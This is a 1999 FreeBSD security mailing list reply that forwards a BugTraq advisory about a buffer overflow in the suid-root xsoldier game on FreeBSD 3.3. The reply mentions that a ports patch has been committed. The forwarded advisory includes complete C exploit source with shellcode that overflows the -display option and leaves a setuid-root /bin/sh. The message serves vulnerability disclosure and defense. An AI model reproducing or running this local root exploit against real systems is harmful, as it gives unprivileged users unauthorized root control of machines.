From owner-freebsd-security  Wed Dec 15 21:11:33 1999
Delivered-To: freebsd-security@freebsd.org
Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20])
	by hub.freebsd.org (Postfix) with ESMTP id DD1BE1558B
	for <freebsd-security@FreeBSD.ORG>; Wed, 15 Dec 1999 21:11:24 -0800 (PST)
	(envelope-from spidey@anarcat.dyndns.org)
Received: by anarcat.dyndns.org (Postfix, from userid 1000)
	id 16DA21B33; Thu, 16 Dec 1999 00:11:23 -0500 (EST)
From: Spidey <beaupran@iro.umontreal.ca>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14424.29817.586093.109020@anarcat.dyndns.org>
Date: Thu, 16 Dec 1999 00:11:21 -0500 (EST)
To: Chris England <cengland@obscurity.org>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: From BugTraq - FreeBSD 3.3 xsoldier root exploit (fwd)
References: <Pine.BSO.4.10.9912152030130.29021-100000@obscurity.org>
X-Mailer: VM 6.72 under 21.1 (patch 7) "Biscayne" XEmacs Lucid
Reply-To: Spidey <beaupran@iro.umontreal.ca>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

A patch has been commited today in the ports collection. I have not
tested either of the patched and un-patched proggies... 

The AnarCat

--- Big Brother told Chris England to write, at 20:36 of December 15:
> I personally have not tested this. I'm not too big on games, but I would
> recommend anyone who has this game installed suid-root to test the snippet
> code against it and post the results to this list.
> 
> Cheers,
> 			-Chris England
> 
> 
> ---------- Forwarded message ----------
> Date: Wed, 15 Dec 1999 17:11:36 MST
> From: Brock Tellier <btellier@USA.NET>
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: FreeBSD 3.3 xsoldier root exploit
> 
> Greetings,
> 
> OVERVIEW
> A vulnerability in FreeBSD 3.3's xsoldier will allow any user to gain root
> access.  This user does not have to have a valid $DISPLAY to exploit this.
> 
> BACKGROUND
> Only FreeBSD 3.3-RELEASE has been tested.  xsoldier, suid-root by default, was
> installed as part of the X11 games packages via /stand/sysinstall.
> 
> DETAILS
> More problems with FreeBSD 3.3 ports.  This time with xsoldier, a suid-root
> game.  A simple overflow in the -display option allows any user to gain root. 
> Although xsoldier only runs under X, a long -display arg on the CL will allow
> us to gain root.
> 
> --- xsoldierx.c ---
> /* 
>  * xsoldier exploit for Freebsd-3.3-RELEASE
>  * Drops a suid root shell in /bin/sh
>  * Brock Tellier btellier@usa.net
>  */
> 
> 
> #include <stdio.h>
> 
> char shell[]= /* mudge@l0pht.com */
>   "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
>    "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
>    "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
>    "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
> 
> #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"
> 
> void buildui() {
> FILE *fp;
>   char cc[100];
>   fp = fopen("/tmp/ui.c", "w");
>   fprintf(fp, CODE);
>   fclose(fp);
>   snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
>   system(cc);
> }
> 
> main (int argc, char *argv[] ) {
>  int x = 0;
>  int y = 0;
>  int offset = 0;
>  int bsize = 4400;
>  char buf[bsize];
>  int eip = 0xbfbfdb65; /* works for me */
>  buildui();
> 
>  if (argv[1]) { 
>    offset = atoi(argv[1]);
>    eip = eip + offset;
>  }
>  fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE
> <btellier@usa.net>\n");
>  fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
>  fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
>  
>  for ( x = 0; x < 4325; x++) buf[x] = 0x90;
>      fprintf(stderr, "NOPs to %d\n", x);
>  
>  for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
>      fprintf(stderr, "Shellcode to %d\n",x);
>   
>   buf[x++] =  eip & 0x000000ff;
>   buf[x++] = (eip & 0x0000ff00) >> 8;
>   buf[x++] = (eip & 0x00ff0000) >> 16;
>   buf[x++] = (eip & 0xff000000) >> 24;
>      fprintf(stderr, "eip to %d\n",x);
> 
>  buf[bsize]='\0';
> 
> execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);
> 
> }
> 
> -------
> 
> Brock Tellier
> UNIX Systems Administrator
> Chicago, IL, USA
> btellier@usa.net
> 
> ____________________________________________________________________
> Get free email and a permanent address at http://www.netaddress.com/?N=1
> 
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

-- 
Si l'image donne l'illusion de savoir
C'est que l'adage pretend que pour croire,
L'important ne serait que de voir

Lofofora


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message